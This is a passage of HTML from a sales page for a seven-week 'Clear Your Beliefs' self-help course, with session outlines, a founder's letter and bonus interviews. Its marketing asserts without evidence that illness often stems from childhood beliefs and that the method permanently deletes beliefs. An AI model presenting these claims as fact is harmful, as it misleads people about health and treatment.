caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of 